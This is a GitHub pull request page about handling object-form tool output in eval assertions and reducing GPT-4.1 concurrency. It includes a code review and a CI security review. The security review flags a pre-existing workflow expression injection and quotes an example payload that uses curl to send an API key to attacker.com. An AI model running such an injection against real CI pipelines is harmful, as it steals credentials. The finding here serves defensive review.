fix: handle object output in eval assertions and reduce GPT-4.1 concurrency #1090
…1 concurrency
Promptfoo returns tool call output as objects (not JSON strings) for some providers like Gemini. The JavaScript assertions now handle both string and object output formats. Also reduces GPT-4.1 concurrency from 20 to 5 to avoid 429 rate limiting.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
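The string-or-object handling described in the commit message could look roughly like the sketch below. This is an illustration only, not the PR's actual assertion code: the helper name `normalizeOutput` and the `ToolOutput` type are assumptions introduced here.

```typescript
// Hypothetical helper: the name and accepted shapes are assumptions,
// not taken from the PR's diff.
type ToolOutput = string | Record<string, unknown> | unknown[];

function normalizeOutput(output: ToolOutput): unknown {
  // Some providers hand back an already-parsed object; pass it through.
  if (typeof output !== "string") return output;
  try {
    // Other providers return a JSON string that still needs parsing.
    return JSON.parse(output);
  } catch {
    // Plain text that is not valid JSON is returned unchanged.
    return output;
  }
}
```

An assertion can then inspect the normalized value without caring which provider produced it.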
Code Review
Blocking Issues
None.
Suggestions
`parseInt(args.concurrency)` in `scripts/eval_skill_triggers_promptfoo.ts:142` doesn't guard against `NaN` (e.g., `--concurrency foo`). A quick `if (isNaN(concurrency))` check with an error message would be more robust, though this is an internal CI tool with a sensible default so it's non-blocking.
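A guard along the lines suggested above might look like this. It is a minimal sketch under stated assumptions: the function name `parseConcurrency`, the `fallback` parameter, and the error wording are hypothetical and not part of the script under review.

```typescript
// Hypothetical helper; the function name and the fallback parameter are illustrative.
function parseConcurrency(raw: string | undefined, fallback: number): number {
  // No flag supplied: use the caller's default.
  if (raw === undefined) return fallback;
  // Always pass the radix so the input is read as base 10.
  const value = Number.parseInt(raw, 10);
  // Reject non-numeric input (NaN) and non-positive values.
  if (Number.isNaN(value) || value < 1) {
    throw new Error(`--concurrency must be a positive integer, got "${raw}"`);
  }
  return value;
}
```

Failing fast with a clear message is one option; silently falling back to the default would also avoid passing `NaN` downstream, at the cost of hiding the typo.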
Overall this is a clean, well-scoped fix. The assertion logic correctly handles both string and object output formats from different model providers, the [object Object] log fix is straightforward, and the per-model concurrency in the workflow matrix is a good approach to rate limit management.
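For context on the `[object Object]` log fix: coercing an object to a string yields the literal text `[object Object]`, so the object has to be serialized before it is truncated for the log. The sketch below shows that idea; `previewOutput` and `maxLength` are assumed names, not identifiers from the PR.

```typescript
// Hypothetical helper; the name and default length are illustrative.
function previewOutput(output: unknown, maxLength = 200): string {
  // Strings are used as-is; anything else is serialized to JSON first.
  const text = typeof output === "string" ? output : JSON.stringify(output);
  // JSON.stringify returns undefined for values such as undefined or
  // functions, so fall back to String() in that case.
  return (text ?? String(output)).slice(0, maxLength);
}
```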
CI Security Review
Critical / High
None.
Medium
- Pre-existing: Expression injection in `multi-model-eval.yml:36-37`. `${{ github.event.inputs.models || 'all' }}` is interpolated directly in a `run:` block. A repo collaborator could inject shell commands via the `workflow_dispatch` input (e.g., `"; curl attacker.com/exfil?key=$ANTHROPIC_API_KEY #`). This is pre-existing and NOT introduced by this PR, but worth noting. Fix: pass the input via an `env:` variable instead of inline interpolation.
- `denoland/setup-deno@v2` not SHA-pinned (`multi-model-eval.yml:49`). Pre-existing. The Deno team is a trusted publisher, but SHA-pinning third-party actions is best practice for supply chain security.
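The `env:` fix for the first finding can be sketched as the workflow fragment below. It is not the actual contents of `multi-model-eval.yml`: the step name and the `MODELS_INPUT` variable are hypothetical. The point is that the expression is expanded into an environment variable, so the shell receives the input as data rather than as part of the script text.

```yaml
# Hypothetical step; the step name and MODELS_INPUT are illustrative only.
- name: Resolve model list
  env:
    # The expression is evaluated here, outside the shell script.
    MODELS_INPUT: ${{ github.event.inputs.models || 'all' }}
  run: |
    # Quote the variable so its value is never re-parsed as shell syntax.
    echo "Selected models: $MODELS_INPUT"
```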
Low
None.
Verdict
PASS — The changes in this PR are security-neutral. They add per-model concurrency to the matrix (hardcoded integer values, no injection risk) and fix eval assertion logic in TypeScript files that don't affect CI security posture. The two medium findings are pre-existing and not introduced by this diff.
Summary
`[object Object]` in failure log output by serializing object responses before slicing
Test Plan
- `deno fmt --check` passes
- `deno lint` passes
🤖 Generated with Claude Code